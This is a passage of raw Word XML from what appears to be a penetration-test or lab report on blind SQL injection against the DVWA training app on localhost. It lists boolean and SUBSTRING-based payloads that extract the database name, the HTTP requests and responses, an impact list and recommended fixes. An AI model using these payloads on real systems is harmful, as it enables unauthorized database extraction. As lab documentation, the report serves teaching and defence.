        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>1' AND LENGTH(database())=4-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="12699B7D" w14:textId="31BC0AC1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>Observe the response:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="01334A2A" w14:textId="12419685">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>"User ID exists in the database"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="77A40FD4" w14:textId="65A038AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>This confirms that the backend database name contains 4 characters.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="0D1C5683" w14:textId="7D5D7902">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>Extract the database name character by character using substring-based conditional queries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="60813031" w14:textId="451F509F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>To identify the first character:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="2880DAC4" w14:textId="5D21C54C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>1' AND SUBSTRING(database(),1,1)='d'-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="159C86F1" w14:textId="1FC88D6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>Response observed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="0EF2EFBC" w14:textId="2C45A2D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>"User ID exists in the database"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="65835CF3" w14:textId="5D868587">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>This confirms that the first character is d.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="4682A240" w14:textId="71817529">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Repeat the same process for the remaining characters: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="7BB63592" w14:textId="47B58B61">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>Second character:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="7012B5FB" w14:textId="00F913E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>1' AND SUBSTRING(database(),2,1)='v'-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="1DCD0500" w14:textId="75DDA358">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>Third character:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="0FAA7F49" w14:textId="4D0AD59F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>1' AND SUBSTRING(database(),3,1)='w'-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="6F09392D" w14:textId="2E954D1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>Fourth character:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="1E671082" w14:textId="7CE7C316">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>1' AND SUBSTRING(database(),4,1)='a'-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="766C6A2E" w14:textId="0583A4DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For each successful payload, the application returned: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="60068F40" w14:textId="77436DD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>"User ID exists in the database"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="552F7E41" w:rsidP="485EA61B" w:rsidRDefault="552F7E41" w14:paraId="6BF73CC9" w14:textId="29C4B58B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Based on the successful character extraction, the backend database name was identified as: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="485EA61B" w:rsidP="291D6C19" w:rsidRDefault="5045372A" w14:paraId="458A6F3A" w14:textId="364BCB91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t>dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="291D6C19" w:rsidRDefault="63F8BA26" w14:paraId="110FFD37" w14:textId="32300F3D">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
        <w:spacing w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
      <w:r w:rsidR="130D6044">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B0F326B" wp14:editId="2B6CFC77">
            <wp:extent cx="6400800" cy="3476625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="164162825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628250" name="Picture 1641628250"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6400800" cy="3476625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="130D6044">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="233884F8" wp14:editId="3ED423A6">
            <wp:extent cx="6400800" cy="3467100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6084115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411534" name="Picture 608411534"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6400800" cy="3467100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="130D6044">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66E737C9" wp14:editId="4EF33386">
            <wp:extent cx="6400800" cy="3467100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20141270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27005" name="Picture 2014127005"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6400800" cy="3467100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="130D6044">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="732E79B1" wp14:editId="236CD3DF">
            <wp:extent cx="6400800" cy="3467100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="292451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451231" name="Picture 292451231"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6400800" cy="3467100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="485EA61B" w:rsidP="485EA61B" w:rsidRDefault="485EA61B" w14:paraId="6B28E41F" w14:textId="1163F6F9">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="485EA61B" w:rsidP="485EA61B" w:rsidRDefault="485EA61B" w14:paraId="1BDAB222" w14:textId="070540E4">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="485EA61B" w:rsidP="485EA61B" w:rsidRDefault="485EA61B" w14:paraId="0404DB3D" w14:textId="76F772F6">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="485EA61B" w:rsidP="485EA61B" w:rsidRDefault="485EA61B" w14:paraId="11D3258A" w14:textId="78BEFBE9">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="4691C0F7" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Proof of Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="6B699379" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="34CB5275" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>True Condition Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="356A7C40" w:rsidRDefault="356A7C40" w14:paraId="2C078CD3"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GET /vulnerabilities/sqli_blind/?id=1%27%20AND%201=1--%20-&amp;Submit=Submit HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="36BB6E3A" w14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E5FA3" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FA"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Host: localhost:4280</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="356A7C40" w:rsidRDefault="356A7C40" w14:paraId="16D6D7B2"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Cookie: PHPSESSID=&lt;session_id&gt;; security=low</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="3B41BBE7" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
        </w:rPr>
        <w:t>Response:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="7A77D85C" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="27AE60"/>
        </w:rPr>
        <w:t>User ID exists in the database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="3FE9F23F" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="707E56A7" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>False Condition Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="356A7C40" w:rsidRDefault="356A7C40" w14:paraId="549F10E0"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GET /vulnerabilities/sqli_blind/?id=1%27%20AND%201=2--%20-&amp;Submit=Submit HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="003EEE5D" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>Response:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="32694925" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>User ID is MISSING from the database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="1F72F646" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="60861570" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Database Enumeration Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="356A7C40" w:rsidRDefault="356A7C40" w14:paraId="1BCA29A7"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1' AND LENGTH(database())=4-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="356A7C40" w14:paraId="053F6E16" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>Inference: Backend database name length = 4. Sensitive information can be extracted character by character.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="61CDCEAD" w14:textId="78E9C8C2">
      <w:pPr>
        <w:spacing w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="0590C468" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="2A23AE58" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>This vulnerability exposes the application to the following risks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="4672D229" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Database structure enumeration without authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="72B777B7" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Extraction of usernames and credentials via iterative queries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="3DF8A867" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Disclosure of sensitive application metadata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="38CC4020" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Privilege escalation and authentication bypass in chained attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="37698F5B" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Full database compromise through systematic inference-based extraction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="532DDFA7" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Although data is not directly returned, blind SQL injection enables complete data extraction given sufficient time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="6BB9E253" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="28B636B6" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Recommended Fix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="6EBF6F91" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Use parameterized queries / prepared statements for all database interactions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="497AC123" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Enforce strict server-side input validation and reject malformed user input</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="2CCA836F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Apply least privilege database access accounts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="550C2745" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Disable verbose SQL error behavior and suppress differential responses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="485DBBA8" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Implement Web Application Firewall (WAF) protections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="04912668" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Conduct regular secure code reviews and penetration testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="23DE523C" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="356A7C40" w:rsidRDefault="356A7C40" w14:paraId="536E256A" w14:textId="77777777">
      <w:pPr>
        <w:pageBreakBefore/>
        <w:shd w:val="clear" w:color="auto" w:fill="2E5FA3"/>
        <w:spacing w:before="200" w:after="100"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
